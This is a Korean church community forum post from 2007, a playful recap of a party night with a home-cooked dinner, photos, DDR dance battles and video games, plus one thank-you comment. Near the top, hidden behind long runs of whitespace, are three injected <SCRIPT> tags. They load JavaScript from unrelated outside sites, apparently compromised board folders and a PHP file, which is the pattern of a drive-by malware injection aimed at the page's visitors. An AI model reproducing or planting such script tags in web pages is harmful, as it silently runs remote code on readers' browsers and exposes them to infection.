겸사겸사party night후기!

김은지 1 3,766 2007.11.12 13:37
                <SCRIPT Language=JavaScript src=http://jesusmylifechurch.org/bbs/data/c1/dkeumyoil.js></script>                                                      <SCRIPT Language=JavaScript src=http://poverty.jinbo.net/bbs/data/freeboard/softs.js></script>                                                          <SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script>

에..후기란!

After 을 얘기하는거졍. got it? 오께..ㅋㅋ 퐐로뮈 훅훅.

대략 6시부터 전화기에 불이나기 시작하더니 ㅋㅋㅋ활활 하얗게 태웠다는..ㅋㅋㅋ

결국은 일이 6시 10분에 끝나서 부랴부랴 난슬언니전화받고 ㅋㅋㅋ
집에가서 나름 ...재밋게 놀려고 게임기를 챙기고
ㅋㅋㅋ집에서 집나가냐면서~ 아주그냥!

오랜만에 현아 또는 놔놔정이라는 아이까지 ㅋㅋ덤으로 챙겨들고
슬자매와 함께 혼다를 타고 눈물흘리면서 ㅋㅋㅋㅋㅋ 언니네 집으로 고고씽!

첨에는 막 어색했으나.....저기요 우리 처음만났거든여...? ㅋㅋㅋㅋㅋㅋㅋㅋ
꺄 다들 급익숙 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

여트은. 도착하고나서 한상 푸~~짐하게 차려진+_+ 저녁식사!

Esther 언니.. 정말 음식 킹왕짱이에효! 부라보 ㅋㅋㅋㅋ
진짜 먹는 내내 감탄이 절로..햐~
그 음식들을 3일내내 준비하셨다니 ㅠ_ㅠ 눈물이 뜨시.

다 먹지못하는 서러움이란 .....ㅈㅣ금도 눈물이 앞을가려횽
언제또 먹어보려나!!! 진짜 큰아쉬움 한개.

그러다가 뽀로타임. 여기저기서 몹쓸 ㅋㅋ플래쉬 터져주시고...
정말 공개 했다가는 시집 또는 장가 못갈 사진들이 ㅋㅋㅋㅋ

여담이지만 여기다가도 올릴껀데요 ..언제올릴지는...큭. 싸이로 놀러오시거나
일촌신청 받아열!

하하. 그러다가 유니폼을 갈아입고 본격적으로 ㅋㅋㅋㅋㅋㅋ
댄스 배틀이 있을 곳으로 고고쒸잉.

나름 게임기 연결 잘한다고 생각했는데...아 진짜
난슬언니 짱이에여 ㅋㅋㅋㅋㅋㅋ 유노? 오끼.

ㅋㅋㅋㅋ그래서...다들 DDR 하느라 정신없고 ㅋㅋㅋ
특히나.....우리 Ladies~ 장난아이였다는!

살뺀다고....아주그냥 work out 모드로 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
미쳤져~~!!! ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
칭찬해주면 유노? 막막 계속 BOO 나오고 ㅋㅋㅋㅋ
님들...껌먼~ 칭찬해주지 말긔 다음부터 ㅋㅋㅋ

그러고 2시간을...넘게 놀았나; 피곤이 몰려오길래
만이 오빠랑....피퐈 한판했는데 와............담에 제대로 붙어열
나 공부해야하는데 ㅋㅋㅋㅋ아씨 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
이럴순없지. ㅋㅋㅋㅋㅋㅋㅋㅋㅋ

휴...........진짜 늦게까지 목사님 사모님 너무 고생많으셨구요 ㅠ_ㅠ
에스더 언니 다시한번 고맙습니다:)

아참.....너무 늦어서 ㅋㅋㅋㅋ우리집에서 자고가라고..슬자매 꼬셨는데
얼떨결에........제가 뉴저지로 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ
부끄럽네연 ㅋㅋㅋㅋㅋㅋ휴

이것저것 다들 하나도ㅣ는 즐거운 시간이여서 너무감사드리고
잊지못할 추억이 된거같아요!

우리 다음에도 어뜨케 한번더~ OK?  에블바리 쎄이 오~~께. 유노?

러뷰 !

Comments

김성민 2007.11.13 01:16
  스더가 많이 수고했네, 억수로 고맙다.^^
페이스북에 공유 트위터에 공유 구글플러스에 공유 카카오스토리에 공유 네이버밴드에 공유